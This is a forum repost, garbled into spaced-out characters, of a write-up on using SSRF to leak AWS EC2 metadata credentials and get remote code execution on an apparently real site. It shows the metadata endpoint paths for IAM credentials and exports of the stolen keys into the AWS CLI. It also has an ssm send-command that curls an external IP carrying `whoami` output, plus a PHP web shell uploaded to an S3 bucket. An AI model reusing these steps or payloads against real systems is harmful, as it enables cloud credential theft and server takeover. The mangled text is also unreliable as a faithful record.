搜索

[13933] 2019-03-31_使用SSRF泄漏云环境中的Metadata数据实现RCE

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2019-03-31_使用SSRF泄漏云环境中的Metadata数据实现RCE 使 S S R F M e t a d a t a R C E s e c i s t   F r e e B u f   2 0 1 9 - 0 3 - 3 1 M e t a d a t a R C E   [ d o c s . r e d a c t . c o m ] [ d o c s ] [ u r l ] g e n e r a l e g 0 x 0 1 . c o m
[ m i m e T y p e ] [ ]   S S R F B u r p S u i t e / [ X - A m z - C f - I d ] A W S S S R F [ 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4 ] E C 2 I P [   l a t e s t / m e t a - d a t a / ] 访 h t t p s : / / d o c s . r e d a c t . c o m / r e p o r t / a p i / v 2 / h e l p / a s s e t ? u r l = h t t p s : / / g e n e r a l e g 0 x 0 1 . c o m & m i m e T y p e = t e x t / h t m l & t = R E D A C T E D . J W T . T O K E N & a d v e r t i s e r I d = 1 1
S S R F [ / l a t e s t / m e t a - d a t a / i a m / s e c u r i t y - c r e d e n t i a l s / ] a w s - e l a s t i c b e a n s t a l k - e c 2 - r o l e   A W S   E l a s t i c   B e a n s t a l k   A W S   E l a s t i c   B e a n s t a l k A W S P a a S J a v a . N E T P H P N o d e . j s P y t h o n R u b y G o W e b 1 [ / l a t e s t / m e t a - d a t a / i a m / s e c u r i t y - c r e d e n t i a l s / a w s - e l a s t i c b e a n s t a l k - e c 2 - r o l e / ] [ A c c e s s K e y I d S e c r e t A c c e s s K e y T o k e n ]
2 [ / l a t e s t / d y n a m i c / i n s t a n c e - i d e n t i t y / d o c u m e n t / ] [ i n s t a n c e I d a c c o u n t I d r e g i o n ]   A W S   t e r m i n a l ~ #   a p t   i n s t a l l   a w s c l i ~ #   e x p o r t   A W S _ A C C E S S _ K E Y _ I D = A c c e s s K e y I d ~ #   e x p o r t   A W S _ S E C R E T _ A C C E S S _ K E Y = S e c r e t A c c e s s K e y ~ #   e x p o r t   A W S _ D E F A U L T _ R E G I O N = r e g i o n ~ #   e x p o r t   A W S _ S E S S I O N _ T O K E N = T o k e n
[ U s e r I D ] S S R F R C E   S S R F     R C E [ s s m   s e n d - c o m m a n d ] 使 A W S   S y s t e m s   M a n a g e r   [ s s m ]   使 a w s   s s m   s e n d - c o m m a n d S e n d C o m m a n d A c c e s s D e n i e d E x c e p t i o n [ S S H ] S S H [ U p l o a d i n g   B a c k d o o r ] [ S 3   B u c k e t ] 使 A W S   C L I A W S 访 ~ #   a w s   s t s   g e t - c a l l e r - i d e n t i t y ~ #   a w s   s s m   s e n d - c o m m a n d   i n s t a n c e - i d s   i n s t a n c e I d   d o c u m e n t - n a m e   A W S - R u n S h e l l S c r i p t   c o m m e n t   w h o a m i   p a r a m e t e r s   c o m m a n d s = c u r l   1 2 8 . 1 9 9 . x x . x x : 8 0 8 0 / ` w h o a m i `   o u t p u t   t e x t   r e g i o n = r e g i o n A n   e r r o r   o c c u r r e d   ( A c c e s s D e n i e d E x c e p t i o n )   w h e n   c a l l i n g   t h e   S e n d C o m m a n d   o p e r a t i o n :   U s e r :   a r n : a w s : s t s : : 7 6 5 x x x x x x x x x : a s s u m e d - r o l e / a w s - e l a s t i c b e a n s t a l k - e c 2 - r o l e / i - 0 0 7 x x x x x x x x x x x x x x   i s   n o t   a u t h o r i z e d   t o   p e r f o r m :   s s m : S e n d C o m m a n d   o n   r e s o u r c e :   a r n : a w s : e c 2 : u s - e a s t - 1 : 7 6 5 x x x x x x x x x : i n s t a n c e / i - 0 0 x x x x x x x x x x x x x x ~ #   a w s   s 3   l s A n   e r r o r   o c c u r r e d   ( A c c e s s D e n i e d )   w h e n   c a l l i n g   t h e   L i s t B u c k e t s   o p e r a t i o n :   A c c e s s   D e n i e d
A W S E l a s t i c B e a n s t a l k W e b T i e r 访 e l a s t i c b e a n s t a l k S 3 b u c k e t s 访 S 3   b u c k e t 使 b u c k e t e l a s t i c b e a n s t a l k - u s - e a s t - 1 - 7 6 x x x x x x x x 0 0 e l a s t i c b e a n s t a l k - u s - e a s t - 1 - 7 6 x x x x x x x x 0 0 b u c k e t 使 A W S   C L I R C E e l a s t i c b e a n s t a l k - r e g i o n - a c c o u n t - i d ~ #   a w s   s 3   l s   s 3 : / / e l a s t i c b e a n s t a l k - u s - e a s t - 1 - 7 6 x x x x x x x x 0 0 /   r e c u r s i v e ~ #   c a t   c m d . p h p < ? p h p   i f ( i s s e t ( $ _ R E Q U E S T [ ' c m d ' ] ) ) {   e c h o   " < p r e > " ;   $ c m d   =   ( $ _ R E Q U E S T [ ' c m d ' ] ) ;   s y s t e m ( $ c m d ) ;   e c h o   " < / p r e > " ;   d i e ;   } ? > ~ #   a w s   s 3   c p   c m d . p h p   s 3 : / / e l a s t i c b e a n s t a l k - u s - e a s t - 1 - 7 6 x x x x x x x x 0 0 / . / c m d . p h p   t o   s 3 : / / d o c s . r e d a c t . c o m / c m d . p h p
S S R F R C E * g e n e r a l e g 0 x 0 1 F B s e c i s t F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理